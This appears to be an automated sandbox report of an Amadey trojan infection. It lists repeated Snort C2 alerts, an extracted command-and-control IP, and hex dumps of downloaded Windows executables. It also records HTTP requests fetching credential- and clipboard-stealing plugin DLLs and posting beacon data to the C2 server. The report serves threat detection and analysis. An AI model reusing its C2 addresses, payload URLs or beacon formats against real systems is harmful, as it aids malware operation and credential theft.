Source: Traffic	Snort IDS: 2856147 ETPRO TROJAN Amadey CnC Activity M3 192.168.2.6:50482 -> 185.215.113.68:80
Source: Traffic	Snort IDS: 2856147 ETPRO TROJAN Amadey CnC Activity M3 192.168.2.6:50484 -> 185.215.113.68:80
Source: Traffic	Snort IDS: 2856147 ETPRO TROJAN Amadey CnC Activity M3 192.168.2.6:50486 -> 185.215.113.68:80
Source: Traffic	Snort IDS: 2856147 ETPRO TROJAN Amadey CnC Activity M3 192.168.2.6:50488 -> 185.215.113.68:80
Source: Traffic	Snort IDS: 2856147 ETPRO TROJAN Amadey CnC Activity M3 192.168.2.6:50490 -> 185.215.113.68:80
Source: Traffic	Snort IDS: 2856147 ETPRO TROJAN Amadey CnC Activity M3 192.168.2.6:50492 -> 185.215.113.68:80
Source: Traffic	Snort IDS: 2856147 ETPRO TROJAN Amadey CnC Activity M3 192.168.2.6:50494 -> 185.215.113.68:80
Source: Traffic	Snort IDS: 2856147 ETPRO TROJAN Amadey CnC Activity M3 192.168.2.6:50496 -> 185.215.113.68:80
Source: Traffic	Snort IDS: 2856147 ETPRO TROJAN Amadey CnC Activity M3 192.168.2.6:50498 -> 185.215.113.68:80
Source: Traffic	Snort IDS: 2856147 ETPRO TROJAN Amadey CnC Activity M3 192.168.2.6:50500 -> 185.215.113.68:80
Source: Traffic	Snort IDS: 2856147 ETPRO TROJAN Amadey CnC Activity M3 192.168.2.6:50502 -> 185.215.113.68:80
Source: Traffic	Snort IDS: 2856147 ETPRO TROJAN Amadey CnC Activity M3 192.168.2.6:50504 -> 185.215.113.68:80
Source: Traffic	Snort IDS: 2856147 ETPRO TROJAN Amadey CnC Activity M3 192.168.2.6:50506 -> 185.215.113.68:80
Source: Traffic	Snort IDS: 2856147 ETPRO TROJAN Amadey CnC Activity M3 192.168.2.6:50508 -> 185.215.113.68:80
Source: Traffic	Snort IDS: 2856147 ETPRO TROJAN Amadey CnC Activity M3 192.168.2.6:50510 -> 185.215.113.68:80
Source: Traffic	Snort IDS: 2856147 ETPRO TROJAN Amadey CnC Activity M3 192.168.2.6:50513 -> 185.215.113.68:80
Source: Traffic	Snort IDS: 2856147 ETPRO TROJAN Amadey CnC Activity M3 192.168.2.6:50515 -> 185.215.113.68:80
Source: Traffic	Snort IDS: 2856147 ETPRO TROJAN Amadey CnC Activity M3 192.168.2.6:50517 -> 185.215.113.68:80
Source: Traffic	Snort IDS: 2856147 ETPRO TROJAN Amadey CnC Activity M3 192.168.2.6:50519 -> 185.215.113.68:80
Source: Traffic	Snort IDS: 2856147 ETPRO TROJAN Amadey CnC Activity M3 192.168.2.6:50521 -> 185.215.113.68:80
Source: Traffic	Snort IDS: 2856147 ETPRO TROJAN Amadey CnC Activity M3 192.168.2.6:50523 -> 185.215.113.68:80
Source: Traffic	Snort IDS: 2856147 ETPRO TROJAN Amadey CnC Activity M3 192.168.2.6:50525 -> 185.215.113.68:80
Source: Traffic	Snort IDS: 2856147 ETPRO TROJAN Amadey CnC Activity M3 192.168.2.6:50527 -> 185.215.113.68:80
Source: Traffic	Snort IDS: 2856147 ETPRO TROJAN Amadey CnC Activity M3 192.168.2.6:50529 -> 185.215.113.68:80
Source: Traffic	Snort IDS: 2856147 ETPRO TROJAN Amadey CnC Activity M3 192.168.2.6:50532 -> 185.215.113.68:80
Source: Traffic	Snort IDS: 2856147 ETPRO TROJAN Amadey CnC Activity M3 192.168.2.6:50534 -> 185.215.113.68:80
Source: Traffic	Snort IDS: 2856147 ETPRO TROJAN Amadey CnC Activity M3 192.168.2.6:50536 -> 185.215.113.68:80
Source: Traffic	Snort IDS: 2856147 ETPRO TROJAN Amadey CnC Activity M3 192.168.2.6:50538 -> 185.215.113.68:80
Source: Traffic	Snort IDS: 2856147 ETPRO TROJAN Amadey CnC Activity M3 192.168.2.6:50540 -> 185.215.113.68:80
Source: Traffic	Snort IDS: 2856147 ETPRO TROJAN Amadey CnC Activity M3 192.168.2.6:50542 -> 185.215.113.68:80
Source: Traffic	Snort IDS: 2856147 ETPRO TROJAN Amadey CnC Activity M3 192.168.2.6:50546 -> 185.215.113.68:80
Source: Traffic	Snort IDS: 2856147 ETPRO TROJAN Amadey CnC Activity M3 192.168.2.6:50550 -> 185.215.113.68:80
Source: Traffic	Snort IDS: 2856147 ETPRO TROJAN Amadey CnC Activity M3 192.168.2.6:50553 -> 185.215.113.68:80
Source: Traffic	Snort IDS: 2856147 ETPRO TROJAN Amadey CnC Activity M3 192.168.2.6:50556 -> 185.215.113.68:80
Source: Traffic	Snort IDS: 2856147 ETPRO TROJAN Amadey CnC Activity M3 192.168.2.6:50558 -> 185.215.113.68:80
Source: Traffic	Snort IDS: 2856147 ETPRO TROJAN Amadey CnC Activity M3 192.168.2.6:50560 -> 185.215.113.68:80
Source: Traffic	Snort IDS: 2856147 ETPRO TROJAN Amadey CnC Activity M3 192.168.2.6:50562 -> 185.215.113.68:80
Source: Traffic	Snort IDS: 2856147 ETPRO TROJAN Amadey CnC Activity M3 192.168.2.6:50564 -> 185.215.113.68:80
Source: Traffic	Snort IDS: 2856147 ETPRO TROJAN Amadey CnC Activity M3 192.168.2.6:50566 -> 185.215.113.68:80
Source: Traffic	Snort IDS: 2856147 ETPRO TROJAN Amadey CnC Activity M3 192.168.2.6:50568 -> 185.215.113.68:80
Source: Traffic	Snort IDS: 2856147 ETPRO TROJAN Amadey CnC Activity M3 192.168.2.6:50572 -> 185.215.113.68:80
Source: Traffic	Snort IDS: 2856147 ETPRO TROJAN Amadey CnC Activity M3 192.168.2.6:50574 -> 185.215.113.68:80
Source: Traffic	Snort IDS: 2856147 ETPRO TROJAN Amadey CnC Activity M3 192.168.2.6:50576 -> 185.215.113.68:80
Source: Traffic	Snort IDS: 2856147 ETPRO TROJAN Amadey CnC Activity M3 192.168.2.6:50578 -> 185.215.113.68:80
Source: Traffic	Snort IDS: 2856147 ETPRO TROJAN Amadey CnC Activity M3 192.168.2.6:50580 -> 185.215.113.68:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

IPs: 185.215.113.68

Creates HTML files with .exe extension (expired dropper behavior)

Source: C:\Users\user\AppData\Local\Temp\d887ceb89d\explorhe.exe

File created: setuppowergrepdemo.exe.46.dr

Source: unknown

Network traffic detected: DNS query count 53

Source: global traffic	TCP traffic: 192.168.2.6:49699 -> 193.233.132.62:50500
Source: global traffic	TCP traffic: 192.168.2.6:49850 -> 194.33.191.102:21751

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 17 Jan 2024 23:34:20 GMTContent-Type: application/octet-streamContent-Length: 1388032Last-Modified: Thu, 18 Jan 2024 07:20:25 GMTConnection: keep-aliveETag: "65a8d139-152e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 77 44 fe d8 33 25 90 8b 33 25 90 8b 33 25 90 8b 68 4d 93 8a 3d 25 90 8b 68 4d 95 8a ad 25 90 8b 68 4d 94 8a 20 25 90 8b e6 48 94 8a 21 25 90 8b e6 48 93 8a 27 25 90 8b e6 48 95 8a 46 25 90 8b 68 4d 91 8a 22 25 90 8b 33 25 91 8b e3 25 90 8b a8 4b 99 8a 32 25 90 8b a8 4b 6f 8b 32 25 90 8b a8 4b 92 8a 32 25 90 8b 52 69 63 68 33 25 90 8b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 6c d6 96 65 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 0a 05 00 00 b0 01 00 00 00 00 00 0c fb 3f 00 00 10 00 00 00 20 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 40 00 00 04 00 00 00 00 00 00 02 00 40 80 00 00 20 00 00 20 00 00 00 00 20 00 00 20 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 00 31 00 3c 02 00 00 00 f0 06 00 d8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 00 31 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 31 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 05 00 00 10 00 00 00 3c 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 20 01 00 00 20 05 00 00 6a 00 00 00 40 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 50 00 00 00 40 06 00 00 0a 00 00 00 aa 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 10 00 00 00 90 06 00 00 00 00 00 00 b4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 50 00 00 00 a0 06 00 00 3c 00 00 00 b4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 00 10 00 00 00 f0 06 00 00 02 00 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 d0 29 00 00 00 07 00 00 fc 02 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 64 61 74 61 00 00 00 00 40 0f 00 00 d0 30 00 00 40 0f 00 00 ee 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 17 Jan 2024 23:34:29 GMTContent-Type: application/octet-streamContent-Length: 916480Last-Modified: Thu, 18 Jan 2024 07:20:25 GMTConnection: keep-aliveETag: "65a8d139-dfc00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 39 d1 a8 65 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 4c 04 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 60 0e 00 00 04 00 00 b8 4e 0e 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 8e 0c 00 7c 01 00 00 00 40 0d 00 40 90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 0d 00 94 75 00 00 f0 0f 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 0c 00 18 00 00 00 10 10 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 94 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1d ab 09 00 00 10 00 00 00 ac 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 fb 02 00 00 c0 09 00 00 fc 02 00 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 70 00 00 00 c0 0c 00 00 48 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 40 90 00 00 00 40 0d 00 00 92 00 00 00 f4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 75 00 00 00 e0 0d 00 00 76 00 00 00 86 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 17 Jan 2024 23:34:29 GMTContent-Type: application/octet-streamContent-Length: 916480Last-Modified: Thu, 18 Jan 2024 07:20:25 GMTConnection: keep-aliveETag: "65a8d139-dfc00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 39 d1 a8 65 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 4c 04 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 60 0e 00 00 04 00 00 b8 4e 0e 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 8e 0c 00 7c 01 00 00 00 40 0d 00 40 90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 0d 00 94 75 00 00 f0 0f 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 0c 00 18 00 00 00 10 10 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 94 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1d ab 09 00 00 10 00 00 00 ac 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 fb 02 00 00 c0 09 00 00 fc 02 00 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 70 00 00 00 c0 0c 00 00 48 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 40 90 00 00 00 40 0d 00 00 92 00 00 00 f4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 75 00 00 00 e0 0d 00 00 76 00 00 00 86 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 17 Jan 2024 23:34:53 GMTContent-Type: application/octet-streamContent-Length: 104448Last-Modified: Thu, 04 Jan 2024 19:50:16 GMTConnection: keep-aliveETag: "65970bf8-19800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 f6 04 b3 63 97 6a e0 63 97 6a e0 63 97 6a e0 38 ff 69 e1 69 97 6a e0 38 ff 6f e1 eb 97 6a e0 38 ff 6e e1 71 97 6a e0 b6 fa 6e e1 6c 97 6a e0 b6 fa 69 e1 72 97 6a e0 b6 fa 6f e1 42 97 6a e0 38 ff 6b e1 64 97 6a e0 63 97 6b e0 02 97 6a e0 f8 f9 63 e1 60 97 6a e0 f8 f9 6a e1 62 97 6a e0 f8 f9 95 e0 62 97 6a e0 f8 f9 68 e1 62 97 6a e0 52 69 63 68 63 97 6a e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 68 d6 96 65 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 18 00 0e 01 00 00 92 00 00 00 00 00 00 21 67 00 00 00 10 00 00 00 20 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 01 00 00 04 00 00 00 00 00 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 a0 7a 01 00 9c 00 00 00 3c 7b 01 00 50 00 00 00 00 b0 01 00 f8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 01 00 00 13 00 00 b0 6f 01 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 6f 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 48 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 56 0c 01 00 00 10 00 00 00 0e 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 a0 62 00 00 00 20 01 00 00 64 00 00 00 12 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 04 17 00 00 00 90 01 00 00 0c 00 00 00 76 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 00 00 00 00 b0 01 00 00 02 00 00 00 82 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 00 13 00 00 00 c0 01 00 00 14 00 00 00 84 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0

Source: global traffic	HTTP traffic detected: GET /dl/3900221/setuppowergrepdemo.exe HTTP/1.1Host: tmpfiles.org
Source: global traffic	HTTP traffic detected: GET /theme/Plugins/cred64.dll HTTP/1.1Host: 185.215.113.68
Source: global traffic	HTTP traffic detected: POST /theme/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.68Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /theme/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.68Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 34 42 34 45 46 41 38 42 37 43 39 37 39 39 31 34 33 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 34 32 44 37 38 42 34 35 45 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58984B4EFA8B7C97991434AB140BE1D46450FC9DDF642E3BDD70A7AB42D78B45E82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic	HTTP traffic detected: GET /theme/Plugins/clip64.dll HTTP/1.1Host: 185.215.113.68
Source: global traffic	HTTP traffic detected: GET /autorun.exe HTTP/1.1Host: 194.33.191.102
Source: global traffic	HTTP traffic detected: POST /theme/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.68Content-Length: 5Cache-Control: no-cacheData Raw: 77 6c 74 3d 31 Data Ascii: wlt=1
Source: global traffic	HTTP traffic detected: POST /theme/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.68Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 33 39 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000397001&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /theme/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.68Content-Length: 31Cache-Control: no-cacheData Raw: 65 31 3d 31 30 30 30 34 30 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: e1=1000400001&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /theme/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.68Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /theme/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.68Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 34 42 34 45 46 41 38 42 37 43 39 37 39 39 31 34 33 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 34 32 44 37 38 42 34 35 45 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58984B4EFA8B7C97991434AB140BE1D46450FC9DDF642E3BDD70A7AB42D78B45E82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic	HTTP traffic detected: POST /theme/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.68Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /theme/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.68Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 34 42 34 45 46 41 38 42 37 43 39 37 39 39 31 34 33 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 34 32 44 37 38 42 34 35 45 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58984B4EFA8B7C97991434AB140BE1D46450FC9DDF642E3BDD70A7AB42D78B45E82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic	HTTP traffic detected: POST /theme/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.68Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /theme/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.68Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 34 42 34 45 46 41 38 42 37 43 39 37 39 39 31 34 33 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 34 32 44 37 38 42 34 35 45 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58984B4EFA8B7C97991434AB140BE1D46450FC9DDF642E3BDD70A7AB42D78B45E82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic	HTTP traffic detected: POST /theme/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.68Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
